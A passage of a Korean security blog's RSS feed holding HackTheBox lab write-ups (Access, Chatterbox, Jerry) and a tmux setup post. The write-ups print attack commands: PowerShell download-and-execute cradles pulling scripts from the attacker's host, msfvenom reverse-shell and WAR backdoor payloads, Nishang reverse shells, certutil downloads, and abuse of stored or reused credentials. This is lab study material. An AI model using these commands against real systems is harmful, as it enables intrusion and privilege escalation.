      <link>https://myreversing.tistory.com/406</link>
      <description>&lt;p&gt;&lt;b&gt;Access&lt;/b&gt;&lt;/p&gt;&lt;p&gt;- MS Access DB읽어오는 방법&lt;/p&gt;&lt;p&gt;- tool설치하거나 칼리에 있는거 사용하거나&lt;/p&gt;&lt;p&gt;- 파워쉘 막혔을떄 어떻게 할지, StoredCredentials&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;root@kali:/HTB/Access# ftp&lt;/p&gt;&lt;p&gt;ftp&amp;gt; binary&lt;/p&gt;&lt;p&gt;ftp&amp;gt; get backup.mdb&lt;/p&gt;&lt;p&gt;ftp&amp;gt; get &quot;Access Control.zip&quot;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;&lt;b&gt;* wget을 사용해서 ftp 익명유저로 다운로드 가능함, 이방법이 ftp접근해서 get하는 것보다 편리함&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;wget -m ftp://anonymos:anonymous@10.10.10.98&lt;/p&gt;&lt;p&gt;wget -m --no-passive ftp://anonymos:anonymous@10.10.10.98&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;root@kali:/HTB/Access# file backup.mdb&lt;/p&gt;&lt;p&gt;root@kali:/HTB/Access# strings backup.mdb &amp;gt; backup.txt&lt;/p&gt;&lt;p&gt;engineer&lt;/p&gt;&lt;p&gt;access4u@security&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;root@kali:/HTB/Access# 7z x -paccess4u@security ac.zip&amp;nbsp;&lt;/p&gt;&lt;p&gt;root@kali:/HTB/Access# file 'Access Control.pst'&amp;nbsp;&lt;/p&gt;&lt;p&gt;Access Control.pst: Microsoft Outlook email folder (&amp;gt;=2003)&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Hi there,&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.&amp;nbsp; Please ensure this is passed on to your engineers.&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;Regards,&lt;/p&gt;&lt;p&gt;John&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;root@kali:/HTB/Access# telnet 10.10.10.98&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;login: security&lt;/p&gt;&lt;p&gt;password: 4Cc3ssC0ntr0ller&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;*===============================================================&lt;/p&gt;&lt;p&gt;Microsoft Telnet Server.&lt;/p&gt;&lt;p&gt;*===============================================================&lt;/p&gt;&lt;p&gt;C:\Users\security\Desktop&amp;gt;type user.txt&lt;/p&gt;&lt;p&gt;ff1f3b48913b213a31ff6756d2553d38&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;권한상승&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;JAWS.ps1 Enumeration&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;&amp;gt; Stored Credential 취약점&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;c:\Users\Public\Desktop\ZKAccess.35.lnk&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;or 파워쉘에서 아래 명령 실행&lt;/p&gt;&lt;p&gt;PS&amp;gt; cmdkey /list&lt;/p&gt;&lt;p&gt;User: Access\Administrator&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Shotcut 찾기 명령어&lt;/p&gt;&lt;p&gt;PS&amp;gt; $WScript = New-Object -ComObject Wscript.Shell&lt;/p&gt;&lt;p&gt;PS&amp;gt; $shortcut = Get-ChildItem *.lnk&lt;/p&gt;&lt;p&gt;PS&amp;gt; $shortcut&lt;/p&gt;&lt;p&gt;PS&amp;gt; $WScript.CreateShortcut($shortcut)&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;니샹 리버스쉘로 관리자 로그인&lt;/p&gt;&lt;p&gt;PS&amp;gt; runas /user:Access\Administrator /savecred &amp;lt;실행할 명령&amp;gt;&lt;/p&gt;&lt;p&gt;PS&amp;gt; runas /user:ACCESS\Administrator /savecred &quot;powershell -c IEX (New-Object&lt;/p&gt;&lt;p&gt;Net.Webclient).downloadstring('http://10.10.14.2/admin.ps1')&quot;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;+TIP: Kali에서 파워쉘 명령&amp;nbsp;base64 인코딩해서 사용&lt;/b&gt;&lt;/p&gt;&lt;p&gt;echo -n &quot;윈도에서 실행할 명령&quot; | iconv --to-code UTF-16LE | base64 -w 0&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Kali&amp;gt; echo -n &quot;IEX (New-Object&lt;/p&gt;&lt;p&gt;Net.Webclient).downloadstring('http://10.10.14.2/admin.ps1')&quot; | iconv --to-code UTF-16LE | base64 -w 0&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;PS&amp;gt; runas /user:ACCESS\Administrator /savecred &quot;powershell -EncodedCommand &quot;&amp;lt;base64&amp;gt;&quot;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Typically &quot;runas /savecred&quot; is used to create a shortcut, which the user clicks to run the desired&lt;/p&gt;&lt;p&gt;application. The commands below are used to enumerate all the accessible shortcut (.lnk) files on&lt;/p&gt;&lt;p&gt;the system, and examine them for the presence of the &quot;runas&quot; command&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&amp;gt; Get-ChildItem &quot;C:\&quot; *.lnk -Recurse -Force | ft fullname | Out-File shortcuts.txt&lt;/p&gt;&lt;p&gt;&amp;gt; ForEach ( $file in gc .\shortcuts.txt) { Write-Output $file ; gc $file | Select-String runas }&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</description>
      <category>OSCP/HackTheBox</category>
      <category>Base64</category>
      <category>cmdkey</category>
      <category>JAWS.ps1</category>
      <category>MSAccess</category>
      <category>stored credential</category>
      <author>우와해커</author>
      <guid isPermaLink="true">https://myreversing.tistory.com/406</guid>
      <comments>https://myreversing.tistory.com/406#entry406comment</comments>
      <pubDate>Sat, 26 Sep 2020 21:53:11 +0900</pubDate>
    </item>
    <item>
      <title>ippsec tmux 셋팅</title>
      <link>https://myreversing.tistory.com/405</link>
      <description>&lt;p&gt;ippsec tmux 셋팅&lt;/p&gt;&lt;p&gt;https://www.youtube.com/watch?v=Lqehvpe_djs&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;~/.tmux.conf&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;#prefix&lt;/p&gt;&lt;p&gt;set -g prefix C-a&lt;/p&gt;&lt;p&gt;bind C-a send-prefix&lt;/p&gt;&lt;p&gt;unbind C-b&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;#history, block pane rename&lt;/p&gt;&lt;p&gt;set -g history-limit 10000&lt;/p&gt;&lt;p&gt;set -g allow-rename off&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;bind-key j command-prompt -p &quot;join pane from:&quot; &quot;join-pane -s '%%'&quot;&lt;/p&gt;&lt;p&gt;bind-key s command-prompt -p &quot;send pane to:&quot; &quot;join-pane -t '%%'&quot;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;# vim color&lt;/p&gt;&lt;p&gt;set -g default-terminal &quot;screen-256color&quot;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;#logging&lt;/p&gt;&lt;p&gt;set-window-option -g mode-keys vi&lt;/p&gt;&lt;p&gt;run-shell ~/clone/path/logging.tmux&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;tmux 로깅설정 참고&lt;/p&gt;&lt;p&gt;https://github.com/tmux-plugins/tmux-logging&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;로깅 저장 (홈디렉토리에 저장됨)&lt;/p&gt;&lt;p&gt;&lt;code style=&quot;box-sizing: border-box; font-family: SFMono-Regular, Consolas, &amp;quot;Liberation Mono&amp;quot;, Menlo, monospace; font-size: 13.6px; padding: 0.2em 0.4em; margin: 0px; background-color: rgba(27, 31, 35, 0.05); border-radius: 6px; color: rgb(36, 41, 46);&quot;&gt;prefix + alt + shift + p&lt;/code&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;C-a:Control+a, prefix단축키&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;C-방향키: pane 이동&lt;/p&gt;&lt;p&gt;C-a+z:&amp;nbsp; pane Zoom In모드 / pane 풀스크린&lt;/p&gt;&lt;p&gt;C-a+방향키: pane 리사이즈 (C-a 홀드상태)&lt;/p&gt;&lt;p&gt;C-a+},{: pane 레이아웃 이동(서클방향)&lt;/p&gt;&lt;p&gt;C-a+?: 명령어 보기&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;C-a+s : pane 보내기&lt;/p&gt;&lt;p&gt;C-a+j : pane 가져오기&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;C-a+[: Edit모드&lt;/p&gt;&lt;p&gt;C-a+[+?: 단어 Search&lt;/p&gt;&lt;p&gt;C-a+[+/: 검새단어 이동&lt;/p&gt;&lt;p&gt;스페이스: 카피지점&amp;nbsp;&lt;/p&gt;&lt;p&gt;엔터: 복서 마무리 완료&lt;/p&gt;&lt;p&gt;C-a+]: 붙여넣기&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;C-a+%: 수직스플릿&lt;/p&gt;&lt;p&gt;C-a+&quot;: 수평스플릿&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;C+방향키: 단어단위로 이동&lt;/p&gt;</description>
      <category>TOOL설치</category>
      <category>tmux</category>
      <author>우와해커</author>
      <guid isPermaLink="true">https://myreversing.tistory.com/405</guid>
      <comments>https://myreversing.tistory.com/405#entry405comment</comments>
      <pubDate>Sat, 26 Sep 2020 12:53:00 +0900</pubDate>
    </item>
    <item>
      <title>[Windows] Chatterbox</title>
      <link>https://myreversing.tistory.com/404</link>
      <description>&lt;p&gt;&lt;b&gt;Chatterbox&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;- Exploit POC 스크립트를 수정하는 법을 알아야함&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;- 파워쉘 명령어에 익숙해야함&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Achat.exe에 대한 exploit이 존재함&lt;/p&gt;&lt;p&gt;=&amp;gt; &lt;b&gt;페이로드 poc가 cmd 실행으로 되어있어서 리버스 쉘 옵션으로 교체함&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;그 외 배드캐릭터 옵션과 인코딩 등 다른 옵션들은 그대로 사용&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;msfvenom -a x86 platform windows -p windows/shell_reverse_tcp&lt;/p&gt;&lt;p&gt;lhost=... lport=... -e x86/unicode_mixed -b &quot;\x00....&quot; BufferRegister=EAX -f python&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;완성된 쉘코드를 파이썬 스크립트 상에서 교체 후 타겟 IP와 포트 확인 후 변경하여 Exploit&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;+POC 분석에 대하여&amp;nbsp;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;1152 - len(Payload)&lt;/p&gt;&lt;p&gt;이 코드를 보고 1152는 페이로드의 맥시멈 사이즈로 예상할 수 있음&lt;/p&gt;&lt;p&gt;따라서, 리버스 쉘 페이로드가 이 크기보다 아래의 값으로 작성되야됨&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;생성된 페이로드 사이즈 줄이는 팁&lt;/p&gt;&lt;p&gt;1. 오리지널 리버스 파워쉘 생성: 15246바이트가 생성됨&lt;/p&gt;&lt;p&gt;msfvenom -a x86 platform windows -p windows/powershell_reverse_tcp&lt;/p&gt;&lt;p&gt;lhost=... lport=... -e x86/unicode_mixed -b &quot;\x00....&quot; BufferRegister=EAX -f python&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;2. CMD변수를 사용: 700바이트로 줄어듬&lt;b&gt;(파이썬 크기가&amp;nbsp;아닌 페이로드 크기를 봐야됨)&lt;/b&gt;&lt;/p&gt;&lt;p&gt;msf venom -a x86 --platform windows&lt;b&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt; -p windows/exec&lt;/span&gt;&lt;/b&gt; &lt;b&gt;CMD=&quot;powershell \&quot;IEX(New-Object Net.webClient).downloadString('http://10.10.14.30/PleaseSubscribe.ipp')\&quot;&quot;&lt;/b&gt; -b &quot;......&quot; BufferRegister=EAX -f python&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;3. Nishang 파워쉘 셋업하기&lt;/p&gt;&lt;p&gt;3.1. Invoke-Powershell-TCP.ps1 스크립트 복사&lt;/p&gt;&lt;p&gt;3.2. 마지막 부분에 옵션 추가(다운로드 후 바로 트리거되기 위함)&amp;nbsp; Invoke-PowershellTcp -Reverse -IPAddress 10.10.14.30 -Port 9002&lt;/p&gt;&lt;p&gt;3.3. 이름 변경&amp;nbsp;&lt;/p&gt;&lt;p&gt;mv Invoke-Powershell-TCP.ps1 PleaseSubscribe.ipp&lt;/p&gt;&lt;p&gt;3.4. 스크립트 트리거 후 nc 9002번 대기&amp;nbsp;&lt;/p&gt;&lt;p&gt;=&amp;gt; 파워쉘 세션생성&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;권한상승 Recon&lt;/b&gt;&lt;/p&gt;&lt;p&gt;- Sherlock.ps1: half쉘에서 실행하면 Exploit 취약점 목록을 열거할 수 있음&lt;/p&gt;&lt;p&gt;- PowerUp.ps1: 스크립트를 사용하려면 먼저 Nishang 파워쉘로 fully interactive 세션으로 접근해야됨&lt;/p&gt;&lt;p&gt;PS&amp;gt; iex(New-Object Net.WebClient).downloadString('http://10.10.14.30/PowerUp.ps1')&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;파워쉘 상에서 iex &lt;/span&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;명령으로 인해 다운받은 스크립트가 장착됨.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;바로 매소드 호출&lt;/p&gt;&lt;p&gt;PS&amp;gt; Invoke-AllChecks&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;플래그 얻는 두가지 방법&lt;/b&gt;&lt;/p&gt;&lt;p&gt;1. winPEAS.bat 또는 PowerUp.ps1돌리면 Alfred 하드코드 취약점 발견&lt;/p&gt;&lt;p&gt;=&amp;gt; administrator 같은 패스워드(re-use) 사용 체크&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;powershell사용하여 연결 또는 SMB 오픈 후 impacket의 psexec를 통해 연결하여 Administrator 접근을 시도해볼 수 있다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;1.1 powershell 사용하기&lt;/b&gt;&lt;/p&gt;&lt;p&gt;$cred 변수에 관리자 세션의 credential을 저장한다.&lt;/p&gt;&lt;p&gt;PS&amp;gt; $passwd = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force;$creds =New-Object System.Management.Automation.PSCredential('administrator' $passwd)&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;전에 사용했던 니샹쉘 다시 실행시켜서 해당 관리자 세션으로 러버스 쉘이 연결되도록한다.&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;아래 명령 사용하기전에 니샹 쉘을 편집하여 포트번호를 중복되지 않게 수정해줄것.&lt;/b&gt;&lt;/p&gt;&lt;p&gt;PS&amp;gt; Start-Process -FilePath &quot;powershell&quot; -argumentlist &quot;IEX(New-Object Net.webClient).downloadString('http://내아이피/니샹쉘')&quot; -Credential $creds&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Kali&amp;gt; nc -lnvp [포트번호]&lt;/p&gt;&lt;p&gt;PS&amp;gt; whoami&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;2. plink 445 포트포워딩 (&lt;/b&gt;&lt;b&gt;SMB)&lt;/b&gt;&lt;/p&gt;&lt;p&gt;certutil 사용해서 plink 다운로드&lt;/p&gt;&lt;p&gt;cmd&amp;gt; certutil -urlcache -f http://10.10.14.18/plink.exe plink.exe&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;내 ssh데몬 설정파일 편집&amp;nbsp;&lt;/p&gt;&lt;p&gt;/etc/ssh/sshd_config&lt;/p&gt;&lt;p&gt;PermitRootLogin yes로 변경 후 서비스 실행&lt;/p&gt;&lt;p&gt;kali&amp;gt; service ssh start&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;plink로 칼리 연결&lt;/p&gt;&lt;p&gt;plink.exe -l root -pw toor -R 445:127.0.0.1:445 10.10.14.18&lt;/p&gt;&lt;p&gt;–l = username of our target machine (our Kali box)&lt;/p&gt;&lt;p&gt;-pw = password of our Kali box&lt;/p&gt;&lt;p&gt;-R = port forward&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;On Port 445 on our Windows box, I want to redirect that to port 445 on my Kali box.&lt;/p&gt;&lt;p&gt;Click “Yes” when prompted about storing the key. Then hit Enter a few times until you see the root@kali login:&lt;/p&gt;&lt;p&gt;You can verify your port forward by typing netstat -ano | grep 445&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;WinExe(psexec)&amp;nbsp;(이 프로그램을 사용하려면 445포트가 오픈되어 있어야함)&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;This tool is a Linux based tool which then runs commands on a Windows system.&amp;nbsp;&lt;/p&gt;&lt;p&gt;To get going, we’ll try this command: winexe -U Administrator%Welcome1! //127.0.0.1 “cmd.exe”&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;2. Alfred가 root.txt에 대한 권한을 가지고 있어서 ACL변경을 통해&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;읽을 수 있음&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;admin폴더 접근 가능, root플래그 읽기 불가&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;파일 읽기&lt;/b&gt;&lt;/p&gt;&lt;p&gt;PS&amp;gt; gc root.txt&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;권한확인&lt;/b&gt;&lt;/p&gt;&lt;p&gt;PS&amp;gt; icalcs root.txt&lt;/p&gt;&lt;p&gt;Administrator:(F) &amp;lt;- 관리자만 full access접근 허용&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;PS&amp;gt; icalcs ..\Desktop&lt;/p&gt;&lt;p&gt;Alfred:(F) &amp;lt;- Aflred는 Desktop에 full access접근 권한이 있다.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;상위 폴더에 풀접근이 있어서 파일에 권한 부여시도함&lt;/b&gt;&lt;/p&gt;&lt;p&gt;PS&amp;gt; icacls root.txt /grant alfred:f&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;PS&amp;gt; (gc root.txt).substring(0,16)&lt;/p&gt;&lt;p&gt;gc는 Get-Content의 약어&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;CMD에서 상위디렉토리 권한 확인할 경우(cacls)&lt;/p&gt;&lt;p&gt;C:\Users\Administrator\Desktop&amp;gt;cacls C:\Users\Administrator\Desktop&lt;/p&gt;&lt;p&gt;&amp;nbsp; cacls C:\Users\Administrator\Desktop&lt;/p&gt;&lt;p&gt;&amp;nbsp; C:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F&lt;/p&gt;&lt;p&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;CHATTERBOX\Administrator:(OI)(CI)(ID)F&lt;/p&gt;&lt;p&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;BUILTIN\Administrators:(OI)(CI)(ID)F&lt;/p&gt;&lt;p&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;CHATTERBOX\Alfred:(OI)(CI)(ID)F&lt;/p&gt;</description>
      <category>OSCP/HackTheBox</category>
      <category>certutil</category>
      <category>nishang</category>
      <category>password재사용</category>
      <category>reuse</category>
      <category>스크립트 커스터마이징</category>
      <category>파워쉘</category>
      <author>우와해커</author>
      <guid isPermaLink="true">https://myreversing.tistory.com/404</guid>
      <comments>https://myreversing.tistory.com/404#entry404comment</comments>
      <pubDate>Thu, 24 Sep 2020 17:09:40 +0900</pubDate>
    </item>
    <item>
      <title>[Windows] Jerry</title>
      <link>https://myreversing.tistory.com/403</link>
      <description>&lt;p&gt;&lt;b&gt;Jerry&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;배운점&lt;/b&gt;&lt;/p&gt;&lt;p&gt;- 디폴트페이지 접근&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;- msfvenom .war 타입 쉘 지원&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b style=&quot;&quot;&gt;1. tomcat 메니저 페이지 접근 후 디폴트 credential 입력&amp;nbsp;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;/manager/html&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;2. msfvenom으로 jsp/war 타입 리버스쉘 페이로드 생성하여 업로드&lt;/b&gt;&lt;/p&gt;&lt;p&gt;msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.xx.xx LPORT=4449 -f war &amp;gt; backdoor.war&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;잘못된 점&lt;/b&gt;&lt;/p&gt;&lt;p&gt;- &lt;u&gt;msfvenom에서 war타입 리버스 쉘을 제공하는지 모르고 빙빙돌아감&lt;/u&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;1. 칼리에 존재하는 jsp 웹쉘 war파일을 올린 후 msfvenom으로 tcp리버스 쉘 생성하여 업로드&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;2. jsp웹쉘에 접근, 파워쉘로 venom 페이로드 다운로드 받았지만 exe파일 실행이 안되서 망함.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;3. 내가 사용한 단순 cmd jsp웹쉘은 디렉토리 목록도 안보이고 기능이 뭔가 어설픔.&lt;/p&gt;&lt;p&gt;커맨드에 powershell dir 을 통해 보안할 수 있었지만 exe파일 실행은 죽어도 안되더라.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;</description>
      <category>OSCP/HackTheBox</category>
      <category>war 쉘</category>
      <category>디폴트계정</category>
      <category>디폴트페이지</category>
      <category>톰캣</category>
      <author>우와해커</author>
      <guid isPermaLink="true">https://myreversing.tistory.com/403</guid>
      <comments>https://myreversing.tistory.com/403#entry403comment</comments>
      <pubDate>Thu, 24 Sep 2020 15:11:46 +0900</pubDate>
    </item>
  </channel>
</rss>